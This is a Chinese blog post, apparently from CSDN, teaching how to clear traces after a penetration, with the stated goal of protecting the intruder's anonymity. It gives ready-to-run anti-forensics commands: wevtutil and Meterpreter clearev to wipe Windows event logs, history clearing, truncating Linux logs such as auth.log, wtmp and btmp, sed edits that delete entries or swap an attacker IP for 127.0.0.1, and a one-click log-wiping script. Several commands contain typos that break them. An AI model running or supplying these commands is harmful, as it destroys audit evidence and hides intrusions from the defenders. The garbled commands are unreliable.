渗透后消除痕迹的方法及实例讲解

已于 2024-04-18 16:41:31 修改
阅读量1.8k 收藏 34
点赞数 53
文章标签: 网络安全 网络协议 tcp/ip 网络 web安全 python linux
于 2023-12-07 15:44:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81504583/article/details/134855975
版权

目录

 渗透后消除痕迹的流程

 分类和标准

 方法和工具

 方法

 工具

示例

1、windows

2、linux

 实战案例

 推荐书籍

渗透学习线路图

在网络安全领域,渗透后消除痕迹是一个关键的环节。作为一名专业的网络安全从业者,我认识到在成功完成渗透测试后,有效地清除所有痕迹的重要性。很多新手,渗透了忘记擦屁股,最后暴露,如果你刚接触网安,欢迎探讨。

 渗透后消除痕迹的流程

1. 评估痕迹:确定渗透测试过程中可能留下的所有痕迹。
2. 日志清除:删除系统日志、应用程序日志和其他审计跟踪。
3. 消除工具和文件:移除用于渗透的工具、脚本和下载的文件。
4. 恢复修改:恢复被改动的配置和系统设置。
5. 测试验证:确保所有痕迹都被有效清除,避免留下可疑迹象。

 分类和标准

 分类
 日志清除:涉及清除系统日志、应用日志等。
 痕迹抹除:包括删除临时文件、恢复被修改的系统设置。

 标准
 遵守法律和道德原则,确保在授权的环境中进行。
 保持对系统完整性的尊重,避免造成不必要的损害。

 方法和工具

 方法


 使用专业工具:如CCleaner等清理工具,自动化清理痕迹。
 手动清理:对于无法自动清理的部分,如某些日志文件,需要手动删除。

 工具


 Metasploit的clearev命令:用于清除Windows事件日志。
 Linux的logrotate工具:用于管理和清理Linux系统的日志。

示例

1、windows

有远程桌面权限时手动删除日志:

开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志

wevtutil:

wevtutil el             列出系统中所有日志名称
wevtutil cl system      清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security    清理安全日志

meterperter自带清除日志功能:

clearev     清除windows中的应用程序日志、系统日志、安全日志

清除recent:

在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮

或直接打开C:\Users\Administrator\Recent并删除所有内容

或在命令行中输入del /f /s /q “%userprofile%\Recent*.*

2、linux

清除命令历史记录

histroy -r          #删除当前会话历史记录
history -c          #删除内存中的所有命令历史
rm .bash_history   #删除历史文件中的内容
HISTZISE=0          #通过设置历史命令条数来清除所有历史记录

在隐蔽的位置执行命令

使用vim打开文件执行命令

:set history=0
:!command

linux日志文件

/var/run/utmp 记录现在登入的用户
/var/log/wtmp 记录用户所有的登入和登出
/var/log/lastlog 记录每一个用户最后登入时间
/var/log/btmp 记录错误的登入尝试
/var/log/auth.log 需要身份确认的操作
/var/log/secure 记录安全相关的日志信息
/var/log/maillog 记录邮件相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
/var/log/cron 记录定时任务相关的日志信息
/var/log/spooler 记录UUCP和news设备相关的日志信息
/var/log/boot.log 记录守护进程启动和停止相关的日志消息

完全删除日志文件:

cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename

针对性删除日志文件:

删除当天日志
sed  -i '/当天日期/'d  filename

篡改日志文件:

将所有170.170.64.17ip替换为127.0.0.1
sed -i 's/170.170.64.17/127.0.0.1/g'

一键清除脚本:

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

 实战案例

在对一个公司的网络环境进行渗透测试后,我使用Metasploit的clearev命令清除了Windows事件日志,并手动删除了Linux服务器上的一些自定义日志文件。此外,我还恢复了在渗透过程中修改的一些系统配置,确保系统恢复到原始状态。

 推荐书籍

 《精通Metasploit渗透测试(第2版)》中有一章专门讨论了清除渗透痕迹的技术,非常适合希望深入了解这一领域的读者 。

《Metasploit:渗透测试指南》
渗透测试领域的经典之作,涵盖了Metasploit的使用方法、渗透测试流程以及各种常见漏洞的利用方法。如果你想在渗透测试领域扎实地打下基础,这本书是非常值得入手的。

《Web渗透测试实战指南》
讲解Web方向的渗透测试技术,针对各种Web漏洞的攻击方式和防御方法都有详细的解释和案例实践,适合想要深入学习Web渗透测试的同学。

《Web应用黑客攻防实战》
对于初学渗透测试的同学来说容易理解,有较大的实用性。

《白帽子讲Web安全》
浅显易懂的安全读物,主要针对web黑客的技术、漏洞、攻击方式等详细的内容进行综述。

《Kali Linux无处不在的渗透测试手册》
一本技术性较强的实战书籍,主要讲解渗透测试的环境建立、使用,在Kali Linux上的常用渗透测试方法和工具,进行实际操作时可以参考它。

渗透学习线路图

我希望能帮助您更好地理解如何在进行渗透测试后有效地消除痕迹,以保护自己的匿名性和安全性,如有什么问题,欢迎找我聊鸭~

白帽黑客2659
关注
  • 53
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP之A方法实例讲解
12-18
ThinkPHP的A方法用于在内部实例化控制器,其调用格式为: A(‘[项目://][分组/]模块’,’控制器层名称’) 最简单的用法: $User = A('User'); 表示实例化当前项目的UserAction控制器(这个控制器对应的文件位于Lib/Action/UserAction.class.php),如果采用了分组模式,并且要实例化另外一个Admin分组的控制器可以用: $User = A('Admin/User'); 也支持跨项目实例化(项目的目录要保持同级) $User = A('Admin://User'); 表示实例化Admin项目下面的UserAction控制
渗透测试——痕迹清除
zjdda的博客
07-11 1783
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
入侵痕迹清理
st3pby的博客
06-18 2443
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。在授权攻防演练中,攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。在蓝队的溯源中,攻击者的攻击路径都将记录在日志中,所遗留的工具也会被蓝队进行分析,在工具中可以查找特征,红队自研工具更容易留下蛛丝马迹。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉,以防被溯源在演练中失分。Windows日志路径: 常见
渗透篇:清理windows入侵痕迹总结【详细】
Vdieoo的博客
12-03 5830
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 清理windows入侵痕迹 0x01 前言 了解为什么需要清除入侵痕迹? 一、设置跳板 二、必不可少的跳板 三、代理服务器简介 1)http代理服务器 2)Sock5代理服务器 3)VPN代理服务器 四、使用Tor隐身 了解需要删除哪些日志? 1.默认提供的日志 2.防火墙日志 3.IIS日志 4、netstat-an表示什么意思? 0x02 清除Windows日志 0x01.1异常场景解决方案 0...
liunx上查看宝塔的登陆信息
weixin_44877713的博客
06-08 967
bt default
内网渗透系列:痕迹清理方法小结
闵行小鱼塘
08-05 3547
本文学习并小结下痕迹清理方法
红队渗透-window痕迹清除
EdisonJH的博客
05-16 2104
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、windows操作系统基础入门二、windows渗透痕迹清除1.为避免入侵操作行为被发现时,攻击者往往通过各种方式来隐藏自己操作痕迹,比如:删除日志、隐藏后门、日志伪造。 前言 我们在做痕迹清理时,一定要对windows的基础理论,基础知识点明确于心,废话不多说,接下来开始学习。 记录MS08068学习红队三期windows痕迹清除 1、windows用户基础入门 2、windows用户命令入门 3、windows渗透痕.
linux渗透痕迹清除
The current road is different, love needs to distinguish between right and wrong
11-20 3723
历史记录清除 Bash、shell、终端将当前会话中使用的命令列表保存在内存中,因此必须对其进行清理。 history用于命令查看当前历史记录。 环境变量:HISTFILE 查找history命令文件存储路径: echo $HISTFILE #返回当前用户history命令存储文件路径 删除变量: unset HISTFILE 这时候在使用一次"echo HISTFILE"将返回为空。 为了防止历史命令被保存,也可以将其发送到/dev/null HISTFILE=...
内网渗透-Windows&Linux痕迹清除
lza20001103的博客
09-26 5856
Windows&Linux痕迹清除 文章目录Windows&Linux痕迹清除前言Windows痕迹清除Windows日志清理meterpreter清理日志Linux痕迹清除后记 前言 当我们进行内网一系列的渗透之后,就会留下一些命令的痕迹,我们离开的时候,为了防止管理员发现,我们就需要进行内网渗透最后一个环节的内容了,就是进行痕迹清除。命令有点多,大家好好做一下笔记吧。 Windows痕迹清除 Windows日志 如何查看: 事件查看器->windows日志 win+r eventv
记一次简单的域渗透-从Web站点上线不出网内网主机-痕迹清理
weixin_45965246的博客
09-17 432
配置信息DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域web IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogin 10.3.6 MSSQL 2008PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32) 应用:攻击机 IP:192.168.111.1 OS:Windows 10(64) IP:192.168.111.5 OS:K
jQuery事件blur()方法的使用实例讲解
10-17
今天小编就为大家分享一篇关于jQuery事件blur()方法的使用实例讲解,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
python list排序的两种方法实例讲解
09-21
本文主要介绍了python list排序的两种方法实例讲解。具有很好的参考价值,下面跟着小编一起来看下吧
Oracle PLSQL语法大全及实例讲解.pdf
10-21
本文介绍了Oracle PL/SQL语句块、变量、赋值、条件语句、循环语句、游标、集合及例外等,在测试后,结合实例讲解了PL/SQL语法的使用,并对重点内容进行了标注和解析。读者只需按照本文进行学习和操作,即可掌握...
Cisco AP基本配置方法及命令讲解实例
07-21
Cisco AP基本配置方法及命令讲解实例
将PWM变身模拟信号的原理及实例讲解
08-14
将PWM变为模拟信号?其实很简单,本文提出的简单方法就是积分电路的使用。
一次服务器被入侵的处理过程分享
xv7676的博客
05-06 240
Linux 操作系统的动态链接库加载过程中,动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库,LD_PRELOAD 环境变量和 /etc/ld.so.preload 配置文件中指定的动态链接库依然会被装载,它们的优先级比 LD_LIBRARY_PATH 环境变量所定义的链接库查找路径的文件优先级要高,所以能够提前于用户调用的动态库载入。服务器如果可以关闭外网,就关闭外网。
从0到1搭建自己的网站保姆级教程 · 中篇 · 进入我们的宝塔面板【网站建设】
跳探戈的小龙虾的博客
01-09 1500
目录 I.云服务器重装系统、配置服务器密码 II.登录宝塔面板 p.s.一共有三篇,点个关注????不迷路! I.云服务器重装系统、配置服务器密码 紧接上篇,如果在购买的时候,系统已经安装了宝塔Linux面板7.6.0腾讯云专项版,可以跳过本步骤。 如果没有按上面这么选择,则需要重新安装系统,选择 控制台->轻量应用服务器->我的服务器->重装系统: 之后选择 应用镜像->宝塔Linux面板 即可。(重装过程可能要几分钟,耐心等待即可) 换上宝塔面板后,我
如何给宝塔做登陆防护,二次登陆详细操作
连界优站
07-13 371
启用二次登录验证:在安全设置页面中,找到"二次登录验证"选项,并将其开启。可能有一个名为"Google Authenticator"的选项,您可以选择该选项来使用谷歌身份验证器应用进行二次登录验证。使用二次登录验证:每次登录到宝塔面板时,您将需要在登录页面或登录时的弹窗中输入谷歌身份验证器应用生成的验证码。通过以上步骤,您可以为宝塔面板启用二次登录验证,提升登录的安全性。启用二次登录验证:配置完成后,将看到二次登录验证已成功启用的提示。登录到宝塔面板:使用您的管理员账号和密码登录到宝塔面板。
宝塔面板防入侵必备做法
qq_20005121的博客
05-05 795
2. 安装防火墙:在宝塔面板中可以安装并配置防火墙,如firewalld或iptables,限制不必要的网络流量,增加服务器安全性。4. 安装安全插件:宝塔面板支持安装多种安全插件,如病毒扫描、Web应用程序防火墙(WAF)等,可以有效地检测和防御入侵攻击。1. 配置SSH登录:使用SSH协议登录服务器时,可以通过修改SSH端口、禁用root登录、使用密钥登录等方式增强安全性。5. 配置SSL证书:使用HTTPS协议加密数据传输,可以有效防止网络窃听和数据泄露,增加网站和服务器的安全性。
visionpro视觉工具原理及实例讲解pdf 下载
最新发布
10-23
VisionPro视觉工具是一种用于工业视觉应用的软件开发平台,它旨在帮助用户创建和部署各种视觉应用程序。其工作原理主要包括图像获取、预处理、特征提取和判定等步骤。 首先,图像获取是通过相机或其他图像采集设备获取产品图像。然后,对采集到的图像进行预处理,包括去噪、图像增强、图像滤波等操作,以提高图像的质量和对后续处理的可行性。 接下来,特征提取是通过使用各种算法和工具,从预处理后的图像中提取出关键特征。这些特征可以是目标物体的形状、颜色、纹理等。 最后,根据特征提取的结果,使用判定算法来决定产品是否合格。判定算法可以基于预先设定的阈值或模型,进行分类或定位判定。如果产品符合要求,则通过通知或其他方式进行相应的反馈。 实例讲解PDF下载可以通过搜索引擎或相关技术论坛来获取,其中包含了VisionPro视觉工具的应用案例,会详细介绍如何使用该工具进行实际工业视觉应用的开发和部署。 总之,VisionPro视觉工具是一种用于工业视觉应用的软件开发平台,利用图像获取、预处理、特征提取和判定等步骤来实现对产品进行质量检测和判定。通过下载相关的实例讲解PDF,可以更详细地了解该工具的具体应用和使用方法

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值